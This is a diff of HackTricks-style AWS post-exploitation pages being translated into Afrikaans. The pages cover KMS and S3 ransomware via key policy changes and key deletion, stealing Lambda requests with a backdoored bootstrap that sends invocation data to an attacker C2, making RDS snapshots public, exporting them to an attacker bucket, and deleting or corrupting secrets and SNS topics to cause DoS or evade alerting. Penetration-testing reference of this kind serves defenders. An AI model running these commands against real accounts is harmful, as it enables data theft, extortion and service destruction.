@@ -4,134 +4,122 @@ ## KMS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-kms-enum.md {{#endref}} -### Encrypt/Decrypt information +### Enkripteer/Deenkripteer inligting -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: +`fileb://` en `file://` is URI skemas wat in AWS CLI opdragte gebruik word om die pad na plaaslike lĂȘers te spesifiseer: -- `fileb://:` Reads the file in binary mode, commonly used for non-text files. -- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. +- `fileb://:` Lees die lĂȘer in binĂȘre modus, algemeen gebruik vir nie-teks lĂȘers. +- `file://:` Lees die lĂȘer in teksmodus, tipies gebruik vir gewone teks lĂȘers, skripte, of JSON wat nie spesiale kodering vereistes het nie. > [!TIP] -> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) - -- Using a **symmetric** key +> Let daarop dat as jy sekere data binne 'n lĂȘer wil deenkripteer, die lĂȘer die binĂȘre data moet bevat, nie base64 gekodeerde data nie. 
(fileb://) +- Gebruik 'n **simmetriese** sleutel ```bash # Encrypt data aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile +--key-id f0d3d719-b054-49ec-b515-4095b4777049 \ +--plaintext fileb:///tmp/hello.txt \ +--output text \ +--query CiphertextBlob | base64 \ +--decode > ExampleEncryptedFile # Decrypt data aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode +--ciphertext-blob fileb://ExampleEncryptedFile \ +--key-id f0d3d719-b054-49ec-b515-4095b4777049 \ +--output text \ +--query Plaintext | base64 \ +--decode ``` - -- Using a **asymmetric** key: - +- Gebruik van 'n **asimetiese** sleutel: ```bash # Encrypt data aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile +--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ +--encryption-algorithm RSAES_OAEP_SHA_256 \ +--plaintext fileb:///tmp/hello.txt \ +--output text \ +--query CiphertextBlob | base64 \ +--decode > ExampleEncryptedFile # Decrypt data aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode +--ciphertext-blob fileb://ExampleEncryptedFile \ +--encryption-algorithm RSAES_OAEP_SHA_256 \ +--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ +--output text \ +--query Plaintext | base64 \ +--decode ``` - ### KMS Ransomware -An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. 
+'n Aanvaller met bevoorregte toegang oor KMS kan die KMS-beleid van sleutels wysig en **sy rekening toegang oor hulle verleen**, terwyl die toegang wat aan die regte rekening gegee is, verwyder word. -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. +Dan sal die regte rekeninggebruikers nie in staat wees om enige inligting van enige diens wat met daardie sleutels versleuteld is, te bekom nie, wat 'n maklike maar effektiewe ransomware oor die rekening skep. > [!WARNING] -> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). +> Let daarop dat **AWS bestuurde sleutels nie deur hierdie aanval geraak word** nie, slegs **KliĂ«nt bestuurde sleutels**. +> Let ook op die behoefte om die parameter **`--bypass-policy-lockout-safety-check`** te gebruik (die gebrek aan hierdie opsie in die webkonsol maak hierdie aanval slegs moontlik vanaf die CLI). 
```bash # Force policy change aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check +--policy-name default \ +--policy file:///tmp/policy.yaml \ +--bypass-policy-lockout-safety-check { - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] +"Id": "key-consolepolicy-3", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "kms:*", +"Resource": "*" +} +] } ``` - > [!CAUTION] -> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. +> Let daarop dat as jy daardie beleid verander en slegs toegang aan 'n eksterne rekening gee, en dan van hierdie eksterne rekening probeer om 'n nuwe beleid in te stel om **die toegang terug te gee aan die oorspronklike rekening, jy nie in staat sal wees**.
-### Generic KMS Ransomware +### Generiese KMS Ransomware -#### Global KMS Ransomware +#### Globale KMS Ransomware -There is another way to perform a global KMS Ransomware, which would involve the following steps: +Daar is 'n ander manier om 'n globale KMS Ransomware uit te voer, wat die volgende stappe sou behels: -- Create a new **key with a key material** imported by the attacker -- **Re-encrypt older data** encrypted with the previous version with the new one. -- **Delete the KMS key** -- Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys +- Skep 'n nuwe **sleutel met 'n sleutelmateriaal** ingevoer deur die aanvaller +- **Her-enkripteer ou data** wat met die vorige weergawe enkripteer is met die nuwe een. +- **Verwyder die KMS-sleutel** +- Nou kan slegs die aanvaller, wat die oorspronklike sleutelmateriaal het, die enkripteerde data ontcijfer +### Vernietig sleutels ```bash # Destoy they key material previously imported making the key useless aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab # Schedule the destoy of a key (min wait time is 7 days) aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 +--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ +--pending-window-in-days 7 ``` - > [!CAUTION] -> Note that AWS now **prevents the previous actions from being performed from a cross account:** +> Let daarop dat AWS nou **voorkom dat die vorige aksies vanaf 'n kruisrekening uitgevoer kan word:**
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md index 5f25c205a..6c37f1c7e 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md @@ -4,30 +4,26 @@ ## Lambda -For more information check: +Vir meer inligting, kyk: {{#ref}} ../../aws-services/aws-lambda-enum.md {{#endref}} -### Steal Others Lambda URL Requests +### Steel Ander se Lambda URL Versoeke -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. +As 'n aanvaller op een of ander manier daarin slaag om RCE binne 'n Lambda te kry, sal hy in staat wees om ander gebruikers se HTTP versoeke na die lambda te steel. As die versoeke sensitiewe inligting bevat (koekies, geloofsbriewe...) sal hy in staat wees om dit te steel. {{#ref}} aws-warm-lambda-persistence.md {{#endref}} -### Steal Others Lambda URL Requests & Extensions Requests +### Steel Ander se Lambda URL Versoeke & Uitbreidings Versoeke -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. +Deur Lambda Lae te misbruik, is dit ook moontlik om uitbreidings te misbruik en in die lambda te volhard, maar ook versoeke te steel en te wysig. {{#ref}} ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md index bc93fe53a..71eb056d5 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md @@ -1,42 +1,41 @@ -# AWS - Steal Lambda Requests +# AWS - Steel Lambda Versoeke {{#include ../../../../banners/hacktricks-training.md}} -## Lambda Flow +## Lambda Stroom

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

-1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** +1. **Slicer** is 'n proses buite die houer wat **stuur** **aanroepings** na die **init** proses. +2. Die init proses luister op poort **9001** wat 'n paar interessante eindpunte blootstel: +- **`/2018-06-01/runtime/invocation/next`** – kry die volgende aanroepingsgebeurtenis +- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – keer die handler respons vir die aanroep terug +- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – keer 'n uitvoeringsfout terug +3. **bootstrap.py** het 'n lus wat aanroepings van die init proses kry en roep die gebruikerskode aan om dit te hanteer (**`/next`**). +4. Laastens, **bootstrap.py** stuur die **respons** na init -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. +Let daarop dat bootstrap die gebruikerskode as 'n module laai, so enige kode-uitvoering wat deur die gebruikerskode uitgevoer word, gebeur eintlik in hierdie proses. -## Stealing Lambda Requests +## Steel Lambda Versoeke -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. 
This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. +Die doel van hierdie aanval is om die gebruikerskode 'n kwaadwillige **`bootstrap.py`** proses binne die **`bootstrap.py`** proses te laat uitvoer wat die kwesbare versoek hanteer. Op hierdie manier sal die **kwaadwillige bootstrap** proses begin **praat met die init proses** om die versoeke te hanteer terwyl die **legitieme** bootstrap **gevang** is wat die kwaadwillige een uitvoer, sodat dit nie versoeke aan die init proses sal vra nie. -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: +Dit is 'n eenvoudige taak om te bereik aangesien die kode van die gebruiker deur die legitieme **`bootstrap.py`** proses uitgevoer word. So kan die aanvaller: -- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. - - A request must be sent to **`/${invoke-id}/response`** - - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -- Execute a malicious **`boostrap.py`** which will handle the next invocations - - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. 
- - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. +- **Stuur 'n vals resultaat van die huidige aanroep na die init proses**, sodat init dink die bootstrap proses wag vir meer aanroepings. +- 'n Versoek moet gestuur word na **`/${invoke-id}/response`** +- Die invoke-id kan verkry word uit die stapel van die legitieme **`bootstrap.py`** proses deur die [**inspect**](https://docs.python.org/3/library/inspect.html) python module (soos [hier voorgestel](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) of net weer te vra na **`/2018-06-01/runtime/invocation/next`** (soos [hier voorgestel](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). +- Voer 'n kwaadwillige **`boostrap.py`** uit wat die volgende aanroepings sal hanteer +- Vir stealthiness doeleindes is dit moontlik om die lambda aanroepingsparameters na 'n aanvaller beheerde C2 te stuur en dan die versoeke soos gewoonlik te hanteer. +- Vir hierdie aanval is dit genoeg om die oorspronklike kode van **`bootstrap.py`** van die stelsel of [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py) te kry, die kwaadwillige kode by te voeg en dit van die huidige lambda aanroep uit te voer. -### Attack Steps +### Aanval Stappe -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: +1. Vind 'n **RCE** kwesbaarheid. +2. 
Genereer 'n **kwaadwillige** **bootstrap** (bv. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) +3. **Voer** die kwaadwillige bootstrap uit. +Jy kan hierdie aksies maklik uitvoer deur: ```bash python3 < \ - --db-subnet-group-name \ - --publicly-accessible \ - --vpc-security-group-ids +--db-instance-identifier "new-db-not-malicious" \ +--db-snapshot-identifier \ +--db-subnet-group-name \ +--publicly-accessible \ +--vpc-security-group-ids aws rds modify-db-instance \ - --db-instance-identifier "new-db-not-malicious" \ - --master-user-password 'Llaody2f6.123' \ - --apply-immediately +--db-instance-identifier "new-db-not-malicious" \ +--master-user-password 'Llaody2f6.123' \ +--apply-immediately # Connect to the new DB after a few mins ``` - ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot` -An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot. - -If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**. +'n Aanvaller met hierdie toestemmings kan **'n snapshot van 'n DB** **skep** en dit **publiek** **beskikbaar** maak. Dan kan hy eenvoudig 'n DB uit daardie snapshot in sy eie rekening skep. +As die aanvaller **nie die `rds:CreateDBSnapshot`** het nie, kan hy steeds **ander** geskepte snapshots **publiek** maak. ```bash # create snapshot aws rds create-db-snapshot --db-instance-identifier --db-snapshot-identifier 
@@ -54,43 +51,32 @@ aws rds create-db-snapshot --db-instance-identifier --d aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"} ``` - ### `rds:DownloadDBLogFilePortion` -An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions. - +'n Aanvaller met die `rds:DownloadDBLogFilePortion` toestemming kan **gedeeltes van 'n RDS-instantie se loglĂȘers aflaai**. As sensitiewe data of toegangskredens per ongeluk gelog word, kan die aanvaller hierdie inligting moontlik gebruik om hul bevoegdhede te verhoog of ongeoorloofde aksies uit te voer. ```bash aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text ``` - -**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials. +**PotensiĂ«le Impak**: Toegang tot sensitiewe inligting of ongeoorloofde aksies met behulp van gelekte akrediteer. ### `rds:DeleteDBInstance` -An attacker with these permissions can **DoS existing RDS instances**. - +'n Aanvaller met hierdie toestemmings kan **DoS bestaande RDS-instanties**. ```bash # Delete aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot ``` - -**Potential impact**: Deletion of existing RDS instances, and potential loss of data. +**PotensiĂ«le impak**: Verwydering van bestaande RDS-instansies, en potensiĂ«le verlies van data. ### `rds:StartExportTask` > [!NOTE] -> TODO: Test - -An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. 
If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot. +> TODO: Toets +'n Aanvaller met hierdie toestemming kan **'n RDS-instansie-snapshot na 'n S3-bucket uitvoer**. As die aanvaller beheer oor die bestemmings-S3-bucket het, kan hulle potensieel toegang tot sensitiewe data binne die uitgevoerde snapshot verkry. ```bash aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id ``` - -**Potential impact**: Access to sensitive data in the exported snapshot. +**PotensiĂ«le impak**: Toegang tot sensitiewe data in die uitgevoerde snapshot. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md index 16cc52f27..f48b618e3 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md 
@@ -4,39 +4,35 @@ ## S3 -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-s3-athena-and-glacier-enum.md {{#endref}} -### Sensitive Information +### Sensitiewe Inligting -Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets. +Soms sal jy sensitiewe inligting in leesbare formaat in die emmers kan vind. Byvoorbeeld, terraform staat geheime. ### Pivoting -Different platforms could be using S3 to store sensitive assets.\ -For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files. +Verskillende platforms kan S3 gebruik om sensitiewe bates te stoor.\ +Byvoorbeeld, **airflow** kan **DAGs** **kode** daarin stoor, of **webblaaie** kan direk vanaf S3 bedien word. 'n Aanvaller met skryfrechten kan die **kode** van die emmer **wysig** om na ander platforms te **pivot** of **rekeningneem** deur JS-lĂȘers te wysig. ### S3 Ransomware -In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted. +In hierdie scenario, die **aanvaller skep 'n KMS (Key Management Service) sleutel in hul eie AWS-rekening** of 'n ander gecompromitteerde rekening. Hulle maak hierdie **sleutel beskikbaar vir enige iemand in die wĂȘreld**, wat enige AWS-gebruiker, rol, of rekening toelaat om voorwerpe met hierdie sleutel te enkripteer. Die voorwerpe kan egter nie gedekripteer word nie. -The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. 
This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more. +Die aanvaller identifiseer 'n teiken **S3-emmer en verkry skryfniveau toegang** daartoe deur verskeie metodes. Dit kan wees as gevolg van swak emmerkonfigurasie wat dit publiek blootstel of die aanvaller wat toegang tot die AWS-omgewing self verkry. Die aanvaller teiken gewoonlik emmers wat sensitiewe inligting bevat soos persoonlik identifiseerbare inligting (PII), beskermde gesondheidsinligting (PHI), logs, rugsteun, en meer. -To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket. +Om te bepaal of die emmer geteiken kan word vir ransomware, kontroleer die aanvaller die konfigurasie daarvan. Dit sluit in om te verifieer of **S3 Object Versioning** geaktiveer is en of **multi-factor authentication delete (MFA delete) geaktiveer is**. As Object Versioning nie geaktiveer is nie, kan die aanvaller voortgaan. As Object Versioning geaktiveer is maar MFA delete gedeaktiveer is, kan die aanvaller **Object Versioning deaktiveer**. As beide Object Versioning en MFA delete geaktiveer is, word dit moeiliker vir die aanvaller om daardie spesifieke emmer te ransomware. -Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. 
This effectively encrypts the data in the bucket, making it inaccessible without the key. +Met die AWS API, die aanvaller **vervang elke voorwerp in die emmer met 'n geĂ«nkripteerde kopie met hul KMS-sleutel**. Dit enkripteer effektief die data in die emmer, wat dit ontoeganklik maak sonder die sleutel. -To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost. +Om verdere druk te plaas, skeduleer die aanvaller die verwydering van die KMS-sleutel wat in die aanval gebruik is. Dit gee die teiken 'n 7-dae venster om hul data te herstel voordat die sleutel verwyder word en die data permanent verlore gaan. -Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack. +Laastens, die aanvaller kan 'n finale lĂȘer oplaai, gewoonlik genaamd "ransom-note.txt," wat instruksies vir die teiken bevat oor hoe om hul lĂȘers te herwin. Hierdie lĂȘer word sonder enkripsie opgelaai, waarskynlik om die teiken se aandag te trek en hulle bewus te maak van die ransomware-aanval. -**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** +**Vir meer inligting** [**kyk die oorspronklike navorsing**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md index e59cbbaaa..191b7c5ea 100644 
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md 
@@ -4,50 +4,40 @@ ## Secrets Manager -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} -### Read Secrets +### Lees Geheimen -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. +Die **geheimen self is sensitiewe inligting**, [kyk die privesc-bladsy](../aws-privilege-escalation/aws-secrets-manager-privesc.md) om te leer hoe om dit te lees. -### DoS Change Secret Value +### DoS Verander Geheim Waarde -Changing the value of the secret you could **DoS all the system that depends on that value.** +Deur die waarde van die geheim te verander, kan jy **DoS al die stelsels wat op daardie waarde afhanklik is.** > [!WARNING] -> Note that previous values are also stored, so it's easy to just go back to the previous value. - +> Let daarop dat vorige waardes ook gestoor word, so dit is maklik om net terug te gaan na die vorige waarde. 
```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" +--secret-id MyTestSecret \ +--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` - -### DoS Change KMS key - +### DoS Verander KMS-sleutel ```bash aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE +--secret-id MyTestSecret \ +--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` +### DoS Verwydering van Geheim -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - +Die minimum aantal dae om 'n geheim te verwyder is 7 ```bash aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 +--secret-id MyTestSecret \ +--recovery-window-in-days 7 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md index e67a07739..87eaf5dbe 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md @@ -4,7 +4,7 @@ ## SES -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ses-enum.md 
@@ -12,76 +12,50 @@ For more information check: ### `ses:SendEmail` -Send an email. - +Stuur 'n e-pos. ```bash aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json ``` - Still to test. ### `ses:SendRawEmail` -Send an email. - +Stuur 'n e-pos. ```bash aws ses send-raw-email --raw-message file://message.json ``` - -Still to test. - ### `ses:SendTemplatedEmail` -Send an email based on a template. - +Stuur 'n e-pos gebaseer op 'n sjabloon. ```bash aws ses send-templated-email --source --destination --template ``` - -Still to test. - ### `ses:SendBulkTemplatedEmail` -Send an email to multiple destinations - +Stuur 'n e-pos na verskeie bestemmings ```bash aws ses send-bulk-templated-email --source --template ``` - -Still to test. - ### `ses:SendBulkEmail` -Send an email to multiple destinations. - +Stuur 'n e-pos na verskeie bestemmings. ``` aws sesv2 send-bulk-email --default-content --bulk-email-entries ``` - ### `ses:SendBounce` -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - +Stuur 'n **terugstuur e-pos** oor 'n ontvangde e-pos (wat aandui dat die e-pos nie ontvang kon word nie). Dit kan slegs **tot 24 uur na ontvangs** van die e-pos gedoen word. ```bash aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list ``` - -Still to test. - ### `ses:SendCustomVerificationEmail` -This will send a customized verification email. You might need permissions also to created the template email. - +Dit sal 'n aangepaste verifikasie-e-pos stuur. Jy mag dalk ook toestemmings nodig hĂȘ om die sjabloon-e-pos te skep. 
```bash aws ses send-custom-verification-email --email-address --template-name aws sesv2 send-custom-verification-email --email-address --template-name ``` - -Still to test. +Nog om te toets. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md index b24660ee1..866c5f7e5 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md 
@@ -4,81 +4,65 @@ ## SNS -For more information: +Vir meer inligting: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Disrupt Messages +### Ontwrigt Berigte -In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected. +In verskeie gevalle word SNS-onderwerpe gebruik om boodskappe na platforms te stuur wat gemonitor word (e-pos, slack boodskappe...). As 'n aanvaller die sending van die boodskappe wat oor sy teenwoordigheid in die wolk waarsku, voorkom, kan hy onopgemerk bly. ### `sns:DeleteTopic` -An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic. - +'n Aanvaller kan 'n hele SNS-onderwerp verwyder, wat boodskapverlies veroorsaak en toepassings wat op die onderwerp staatmaak, beĂŻnvloed. ```bash aws sns delete-topic --topic-arn ``` - -**Potential Impact**: Message loss and service disruption for applications using the deleted topic. +**PotensiĂ«le Impak**: Boodskapverlies en diensonderbreking vir toepassings wat die verwyderde onderwerp gebruik. ### `sns:Publish` -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SNS-onderwerp stuur, wat moontlik datakorruptie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput. ```bash aws sns publish --topic-arn --message ``` - -**Potential Impact**: Data corruption, unintended actions, or resource exhaustion. +**PotensiĂ«le Impak**: Gegevensbesoedeling, onbedoelde aksies, of hulpbronuitputting. ### `sns:SetTopicAttributes` -An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability. 
